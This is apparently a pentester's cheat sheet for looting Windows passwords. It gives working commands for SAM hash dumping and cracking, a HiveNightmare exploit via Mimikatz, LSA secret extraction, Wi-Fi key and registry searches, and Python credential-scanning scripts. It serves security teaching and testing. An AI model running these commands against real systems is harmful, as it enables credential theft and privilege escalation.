# EoP - Looting for passwords

### 1. Accessing Password Hashes

#### **1.1 Security Account Manager (SAM) and SYSTEM Files**

The SAM hive holds the password hashes of local accounts: LM and NT (the NT hash, shown as "NTLM" by most tools, is MD4 over the UTF-16LE password; LM hashes are no longer stored by default). The hashes are encrypted with a key derived from the SYSTEM hive (the boot key), so you always need both files. Both are locked by the kernel while Windows runs, so you work from copies: the backup locations below, a volume shadow copy, or a `reg save` of the `HKLM\SAM` and `HKLM\SYSTEM` keys as an administrator.

**Locations:**

* `%SystemRoot%\System32\config\SAM` (the live hive, locked while the system runs)
* `%SystemRoot%\repair\SAM` (legacy repair copy from NT-era systems; usually absent today)
* `%SystemRoot%\System32\config\RegBack\SAM` (automatic backup; since Windows 10 1803 these files are 0 bytes unless the backup task was re-enabled)

#### **1.2 Extracting Hashes**

Both tools run offline against copied `SYSTEM` and `SAM` hives and print pwdump-format lines, `user:rid:lmhash:nthash:::`.

**Using pwdump:**

```bash
pwdump SYSTEM SAM > /root/sam.txt
```

**Using samdump2:**

```bash
samdump2 SYSTEM SAM -o sam.txt
```

#### **1.3 Cracking Hashes**

**John the Ripper:**

```bash
john --format=NT /root/sam.txt
```

**Hashcat** (mode 1000 is NT; `--username` makes it accept the `user:rid:lm:nt:::` lines instead of bare hashes, and `--show --username` later maps cracked hashes back to accounts):

```bash
hashcat -m 1000 -a 0 --username sam.txt wordlist.txt
```

***

### 2. Exploiting Vulnerabilities

#### **2.1 HiveNightmare (CVE-2021-36934)**

Also known as SeriousSAM. On Windows 10 1809 and later and on Windows 11, before the July 2021 update, the ACL on the registry hive files grants `BUILTIN\Users` read access, so any local user can read `SAM`, `SYSTEM` and `SECURITY`. The live files are still locked by the kernel, so the read has to go through a volume shadow copy, which carries the same permissive ACL.

**Check for Vulnerability:**

```cmd
icacls %windir%\System32\config\SAM
```

The host is vulnerable if the output contains `BUILTIN\Users:(I)(RX)`; if `BUILTIN\Users` is absent from the output, it is not.

**Exploitation Steps:**

1. **Find a shadow copy.** `vssadmin` needs administrator rights; as a standard user simply try `HarddiskVolumeShadowCopy1`, `2`, and so on in the paths below, since restore points and Windows Update usually leave some behind:

   ```cmd
   vssadmin list shadows
   ```
2. **Extract hives using Mimikatz** (alternatively copy `SAM`, `SYSTEM` and `SECURITY` out of the same `\\?\GLOBALROOT` path and run the offline tools from section 1 against them):

   ```mimikatz
   lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
   ```

***

### 3. LAPS (Local Administrator Password Solution) Settings

#### **Extract LAPS Settings**

The legacy LAPS policy lives under a key whose name contains a space, so the path must be quoted:

**Command:**

```cmd
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /s
```

Windows LAPS, the built-in successor shipped in 2023, keeps its policy under `HKLM\Software\Microsoft\Policies\LAPS` instead.

**Key Values to Look For:**

* **AdmPwdEnabled**: `1` when LAPS manages a local administrator password on this host.
* **AdminAccountName**: the managed account; absent or empty means the built-in Administrator (RID 500).
* **PasswordComplexity**: character classes required in generated passwords.
* **PasswordLength**: length of the generated password.
* **PasswordAgeDays**: rotation interval.
* **PwdExpirationProtectionEnabled**: whether a password may outlive the policy's maximum age.

The password itself is never in the registry: legacy LAPS writes it to the computer object's `ms-Mcs-AdmPwd` attribute in Active Directory, readable only by principals granted that right. These values tell you whether the attribute is worth going after and which local account it unlocks.

***

### 4. Searching for Passwords in Files and Shares

#### **4.1 Local File Search**

**Commands** (`/S` recurses into subdirectories, `/I` ignores case, `/M` prints only file names; the second form also covers `.config` files and sends access-denied errors to `nul`):

```cmd
findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
```

#### **4.2 Searching in Remote Locations**

* **SharePoint:** **SnaffPoint** runs keyword queries against the SharePoint search API with the rights of an ordinary user.
* **SMB Shares:** **Snaffler** enumerates hosts and shares from Active Directory, then classifies files by name, extension and content (keys, configuration files, scripts containing credentials).

***

### 5. Extracting Secrets with Mimikatz

`misc::shadowcopies` lists the shadow copies (administrator rights required); `lsadump::secrets` with `/system:` and `/security:` then reads the LSA secrets offline from the hives in that snapshot: service account passwords (`_SC_<service>`), the autologon `DefaultPassword`, the `DPAPI_SYSTEM` keys and the machine account password (`$MACHINE.ACC`).

**Commands:**

```mimikatz
token::whoami /full
misc::shadowcopies
lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
```

***

### 6. Finding Credentials in Configuration Files

#### **6.1 Unattend.xml**

Answer files left behind by Windows Setup and Sysprep can hold the local administrator, autologon and extra local account passwords.

**Locations:**

* `C:\unattend.xml`
* `C:\Windows\Panther\Unattend.xml`
* `C:\Windows\Panther\Unattend\Unattend.xml`
* `C:\Windows\System32\Sysprep\Unattend.xml`
* `C:\Windows\System32\Sysprep\Sysprep.xml`

**Decode Base64 Passwords:**

In a real answer file the password sits in `<Password><Value>base64</Value><PlainText>false</PlainText></Password>`, and `Value` is the Base64 of the UTF-16LE string formed by the password followed by `Password` (for `<AdministratorPassword>` the suffix is `AdministratorPassword`), so after decoding, drop the NUL bytes and the suffix. When `PlainText` is `true`, `Value` is the password itself. The simplified form in the example below is plain Base64 of the password:

```bash
echo "base64_encoded_password" | base64 -d
```

**Example Content** (simplified; the value decodes to `SecretSecurePassword1234*`):

```xml
<AutoLogon>
  <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=</Password>
  <Enabled>true</Enabled>
  <Username>Administrateur</Username>
</AutoLogon>
```
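The two encodings seen in practice are different enough to defeat a one-liner, so as an added example (not part of the original page) here is a Python extractor that walks an answer file, handles both the `<Value>`/`<PlainText>` form with the UTF-16LE suffix rule and the bare form shown above, and pairs each password with its account. The full answer file is constructed here with the same encoder; the second input is the snippet above.

```python
import base64
import xml.etree.ElementTree as ET

# Suffix Windows Setup appends before UTF-16LE + Base64 encoding a password whose
# <PlainText> is false, keyed by the element that holds it.
SUFFIX = {"Password": "Password", "AdministratorPassword": "AdministratorPassword"}


def encode_value(password: str, suffix: str) -> str:
    """The PlainText=false encoding, used here only to build the sample file."""
    return base64.b64encode((password + suffix).encode("utf-16-le")).decode("ascii")


def decode_value(b64: str, suffix: str) -> str:
    raw = base64.b64decode(b64.strip())
    # Setup-written values are UTF-16LE: for an ASCII password every high byte is 0x00.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        text = raw.decode("utf-16-le")
        return text[:-len(suffix)] if text.endswith(suffix) else text
    # Otherwise assume plain Base64 of the password (e.g. produced with `echo | base64`).
    return raw.decode("utf-8", errors="replace").rstrip("\r\n")


def _local(tag: str) -> str:
    """Strip the urn:schemas-microsoft-com:unattend namespace from a tag."""
    return tag.rsplit("}", 1)[-1]


def extract_passwords(xml_text: str):
    """Return (element, account, password) for every password in an answer file."""
    root = ET.fromstring(xml_text)
    parent = {child: p for p in root.iter() for child in p}
    found = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name not in SUFFIX:
            continue
        kids = {_local(c.tag): c for c in elem}
        if "Value" in kids:
            value = (kids["Value"].text or "").strip()
            pt = kids.get("PlainText")
            plain = pt is not None and (pt.text or "").strip().lower() == "true"
        else:  # bare <Password>base64</Password> form
            value, plain = (elem.text or "").strip(), False
        if not value:
            continue
        password = value if plain else decode_value(value, SUFFIX[name])
        # The account is a sibling element: <Username> under AutoLogon, <Name> under
        # LocalAccount; AdministratorPassword always belongs to the built-in Administrator.
        account = "Administrator" if name == "AdministratorPassword" else None
        for sibling in parent.get(elem, []):
            if _local(sibling.tag) in ("Username", "Name"):
                account = (sibling.text or "").strip()
        found.append((name, account, password))
    return found


# Constructed answer file (no real credentials) in the layout Setup writes.
SAMPLE_UNATTEND = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>{encode_value("Winter2024!", "Password")}</Value>
          <PlainText>false</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{encode_value("S3cretAdm1n!", "AdministratorPassword")}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Name>deploy</Name>
            <Group>Administrators</Group>
            <Password>
              <Value>ClearText1</Value>
              <PlainText>true</PlainText>
            </Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

# The simplified snippet from the page above.
PAGE_SAMPLE = """<AutoLogon>
  <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=</Password>
  <Enabled>true</Enabled>
  <Username>Administrateur</Username>
</AutoLogon>"""

if __name__ == "__main__":
    for hit in extract_passwords(SAMPLE_UNATTEND) + extract_passwords(PAGE_SAMPLE):
        print(hit)
```

The UTF-16LE check (every odd byte zero) is what distinguishes a Setup-written value from a hand-made Base64 string; a password containing non-ASCII characters would need the suffix check alone, which the code still applies after decoding.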

***

### 7. IIS Web Config

`web.config` files hold database credentials in `<connectionStrings>` and often API keys in `<appSettings>`. A `connectionStrings` element carrying a `configProtectionProvider` attribute has been encrypted with `aspnet_regiis`; it can be decrypted on the host (`aspnet_regiis -pdf`) by an account that can access the provider's key, usually an administrator.

**Command:**

```powershell
Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```
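Sections 4.1 and 7 describe the same job from two angles: a recursive text search and a targeted look at `web.config`. As an added example (not part of the original page, and not Snaffler's rule set) here is a Python scanner that does both over a directory tree: `web.config` goes through an XML parser that pulls connection strings, flags encrypted sections and picks out secret-looking `appSettings` keys, other text files get line rules, and binaries are skipped. The tree it scans is constructed in a temporary directory.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Extensions read as text, mirroring the findstr globs above plus scripts.
TEXT_EXTENSIONS = {".xml", ".ini", ".txt", ".config", ".conf", ".ps1", ".bat", ".cmd"}

# Illustrative line rules; the first matching rule per line wins.
LINE_PATTERNS = {
    "private-key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "password-assignment": re.compile(r"(?i)\b(password|passwd|pwd)\b\s*[=:]\s*\S+"),
}


def scan_web_config(path, rel):
    """Connection strings, encrypted sections and secret-looking appSettings."""
    findings = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return findings
    cs = root.find("connectionStrings")
    if cs is not None:
        if cs.get("configProtectionProvider"):
            # Encrypted by aspnet_regiis; note the provider, decrypt on the host later.
            findings.append({"file": rel, "kind": "encrypted-connectionStrings",
                             "detail": cs.get("configProtectionProvider")})
        else:
            for add in cs.findall("add"):
                findings.append({"file": rel, "kind": "connectionString",
                                 "detail": f"{add.get('name')}={add.get('connectionString')}"})
    for add in root.iter("add"):  # appSettings entries use key=/value=
        key = add.get("key") or ""
        if re.search(r"(?i)pass|secret|token|apikey", key):
            findings.append({"file": rel, "kind": "appSetting",
                             "detail": f"{key}={add.get('value')}"})
    return findings


def scan_text(path, rel):
    """Line-by-line regex scan, what findstr does plus a rule name."""
    findings = []
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        for lineno, line in enumerate(fh, 1):
            for kind, pattern in LINE_PATTERNS.items():
                if pattern.search(line):
                    findings.append({"file": rel, "kind": kind,
                                     "detail": f"{lineno}: {line.strip()}"})
                    break
    return findings


def scan_tree(root_dir):
    """Walk root_dir; paths in findings are relative with forward slashes."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root_dir).replace(os.sep, "/")
            if name.lower() == "web.config":
                findings.extend(scan_web_config(path, rel))
            elif os.path.splitext(name)[1].lower() in TEXT_EXTENSIONS:
                findings.extend(scan_text(path, rel))
    return sorted(findings, key=lambda f: (f["file"], f["kind"]))


# Constructed sample tree; none of these credentials are real.
SAMPLE_FILES = {
    "inetpub/wwwroot/web.config": """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="AppDb" connectionString="Server=sql01;Database=app;User ID=app_svc;Password=Sup3rS3cret!" />
  </connectionStrings>
  <appSettings>
    <add key="ApiKey" value="AKIA-EXAMPLE-NOT-REAL" />
    <add key="Theme" value="dark" />
  </appSettings>
</configuration>
""",
    "inetpub/intranet/web.config": """<?xml version="1.0"?>
<configuration>
  <connectionStrings configProtectionProvider="DataProtectionConfigurationProvider">
    <EncryptedData>AQAAANCMnd8BFdERjHoAwE-constructed-blob</EncryptedData>
  </connectionStrings>
</configuration>
""",
    "scripts/deploy.ini": "[db]\nuser=deploy\npassword=Winter2024!\n",
    "docs/readme.txt": "Nothing sensitive here.\n",
    "keys/id_rsa.txt": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktconstructed\n-----END OPENSSH PRIVATE KEY-----\n",
    "tools/setup.exe": "MZ password=ignored-binary\n",  # not a text extension: skipped
}


def build_sample_tree():
    """Write SAMPLE_FILES into a fresh temp dir and return its path."""
    base = tempfile.mkdtemp(prefix="loot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return base


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"{f['file']:32} {f['kind']:28} {f['detail']}")
```

Parsing `web.config` as XML rather than grepping it is what lets the scanner tell a plaintext connection string from an encrypted section, which decides whether you are done or still need `aspnet_regiis` on the host.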

***

### 8. Additional Sources of Passwords

#### **8.1 Wireless Passwords**

**Commands** (the second prints the stored PSK as `Key Content`; quote SSIDs that contain spaces):

```cmd
netsh wlan show profiles
netsh wlan show profile <SSID> key=clear
```

***

#### **8.2 Sticky Notes**

Sticky Notes keeps its content in a SQLite database (table `Note`, column `Text`). The file is locked while the app is running, so copy it elsewhere before opening it with any SQLite client:

```text
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
```

***

#### **8.3 PowerShell History**

**Command** (PSReadLine appends every interactive session to this file; the same path under other users' profiles is worth trying if readable, and `(Get-PSReadlineOption).HistorySavePath` reveals a non-default location):

```powershell
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

***

#### **8.4 Registry Searches**

**Commands** (`/F` is the search string, `/S` recurses, `/t REG_SZ` limits hits to string values; do not add `/K`, which restricts the match to key names and hides values whose data contains the password):

```cmd
REG QUERY HKLM /F "password" /t REG_SZ /S
REG QUERY HKCU /F "password" /t REG_SZ /S
```

Well-known locations worth querying directly: `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon` (`DefaultUserName` and `DefaultPassword` for autologon) and `HKCU\Software\SimonTatham\PuTTY\Sessions` (saved sessions, including proxy credentials).
